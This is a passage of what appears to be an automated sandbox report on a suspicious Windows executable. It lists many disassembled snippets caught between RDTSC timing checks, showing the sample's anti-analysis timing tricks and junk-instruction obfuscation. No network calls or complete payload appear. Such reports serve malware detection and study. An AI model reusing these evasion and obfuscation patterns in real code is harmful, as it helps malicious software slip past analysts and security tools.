eax, dword ptr [eax] 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jng 00007FB9B11D9846h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64FD1 second address: B64FD7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6506E second address: B6509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB9B11D9856h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9B11D9852h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6509F second address: B650A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B650A5 second address: B6513B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FB9B11D9848h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 stc 0x00000024 push 00000000h 0x00000026 and edi, dword ptr [ebp+122D3921h] 0x0000002c push 7F165F1Eh 0x00000031 push ebx 0x00000032 jnp 00007FB9B11D9850h 0x00000038 jmp 00007FB9B11D984Ah 0x0000003d pop ebx 0x0000003e xor dword ptr [esp], 7F165F9Eh 0x00000045 push 00000003h 0x00000047 call 00007FB9B11D9856h 0x0000004c adc edi, 087D88A0h 0x00000052 pop ecx 0x00000053 push 00000000h 0x00000055 mov dl, ch 0x00000057 push 00000003h 0x00000059 sub dword ptr [ebp+122D2D71h], eax 0x0000005f push 6B44F6DCh 0x00000064 push ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FB9B11D9852h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6520A second address: B6529C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9B1005718h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add dword ptr [ebp+122D2A45h], eax 0x00000015 push 00000000h 0x00000017 mov cl, A5h 0x00000019 mov di, 8C26h 0x0000001d push 07F127DAh 0x00000022 push ebx 0x00000023 pushad 0x00000024 push edi 0x00000025 pop edi 0x00000026 jmp 00007FB9B1005722h 0x0000002b popad 0x0000002c pop ebx 0x0000002d xor dword ptr [esp], 07F1275Ah 0x00000034 jno 00007FB9B100571Ah 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FB9B1005718h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 push 00000000h 0x00000058 movzx edx, ax 0x0000005b push 00000003h 0x0000005d pushad 0x0000005e popad 0x0000005f push 801A6483h 0x00000064 push ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FB9B1005721h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6529C second address: B652F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xor dword ptr [esp], 401A6483h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB9B11D9848h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, 27B64F93h 0x00000030 lea ebx, dword ptr [ebp+12446D08h] 0x00000036 movzx esi, di 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jne 00007FB9B11D9846h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B652F9 second address: B652FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86EC4 second address: B86EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86EC9 second address: B86EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB9B1005716h 0x0000000a jmp 00007FB9B100571Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A07F second address: B5A08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A08B second address: B5A095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84D6E second address: B84D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84D74 second address: B84D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84D78 second address: B84D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8504F second address: B8505B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8505B second address: B8505F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B854A4 second address: B854BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85636 second address: B85649 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9B11D9846h 0x00000008 jl 00007FB9B11D9846h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85A73 second address: B85A87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9B100571Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85A87 second address: B85A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB9B11D9846h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85A99 second address: B85AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85AA0 second address: B85ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9B11D9858h 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EB1 second address: B85EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EB5 second address: B85EBF instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EBF second address: B85EF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B1005724h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007FB9B100571Dh 0x00000011 jmp 00007FB9B100571Dh 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EF7 second address: B85F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D9C8 second address: B7D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B1005729h 0x00000009 jng 00007FB9B1005716h 0x0000000f popad 0x00000010 jmp 00007FB9B100571Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D9FB second address: B7DA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86049 second address: B8604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8604F second address: B86062 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FB9B11D9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86062 second address: B86068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86068 second address: B8606E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58641 second address: B58645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FFB9 second address: B8FFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90115 second address: B9011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9011A second address: B9015C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB9B11D9853h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB9B11D9858h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90334 second address: B90346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B100571Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90346 second address: B9034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B500BC second address: B500EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005720h 0x00000007 jg 00007FB9B1005716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FB9B1005729h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93C8A second address: B93C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB9B11D984Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93C9A second address: B93CA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B943B8 second address: B943BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B943BF second address: B943FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9B1005728h 0x00000008 jmp 00007FB9B1005726h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FB9B1005716h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95607 second address: B9562D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB9B11D984Ah 0x00000012 pushad 0x00000013 jmp 00007FB9B11D984Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9598D second address: B9599E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FB9B1005716h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95F5C second address: B95F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95FBD second address: B95FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FB9B1005716h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 jmp 00007FB9B1005720h 0x00000017 adc dl, FFFFFF90h 0x0000001a popad 0x0000001b nop 0x0000001c pushad 0x0000001d jl 00007FB9B100571Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95FF5 second address: B95FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95FF9 second address: B9600A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9600A second address: B9600E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B960D9 second address: B960DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B963F1 second address: B9641D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007FB9B11D9866h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB9B11D9858h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9655A second address: B96560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B965C4 second address: B965EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9B11D984Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9B11D9852h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B965EE second address: B965F8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB9B100571Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B965F8 second address: B96631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FB9B11D9848h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 and edi, dword ptr [ebp+122D3A55h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB9B11D984Ah 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96631 second address: B96653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B100571Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9B100571Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97500 second address: B97507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97507 second address: B9752A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9B1005727h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9752A second address: B97534 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97534 second address: B97539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A5A2 second address: B9A5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A34A second address: B9A34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B0B1 second address: B9B0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B0B6 second address: B9B108 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9B100571Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub esi, dword ptr [ebp+122D39C5h] 0x00000013 push 00000000h 0x00000015 xor esi, 265968B8h 0x0000001b adc si, CB12h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FB9B1005718h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B108 second address: B9B10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1213 second address: BA1222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B100571Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C482 second address: B9C486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C486 second address: B9C48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C48C second address: B9C490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C490 second address: B9C49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C49E second address: B9C4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA31AD second address: BA31B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA31B7 second address: BA31C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3375 second address: BA337B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA452B second address: BA452F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA337B second address: BA337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA452F second address: BA4535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4535 second address: BA453B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA453B second address: BA4551 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FB9B11D984Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8565 second address: BA856F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BADA6F second address: BADA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BADA73 second address: BADA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BADA77 second address: BADA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA52D second address: BAA532 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9559 second address: BA95DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9B11D9857h 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D3765h], eax 0x00000012 xor bh, FFFFFFADh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FB9B11D9848h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bl, C0h 0x0000003f mov eax, dword ptr [ebp+122D026Dh] 0x00000045 jl 00007FB9B11D9852h 0x0000004b jp 00007FB9B11D984Ch 0x00000051 push FFFFFFFFh 0x00000053 movzx ebx, dx 0x00000056 movzx edi, bx 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
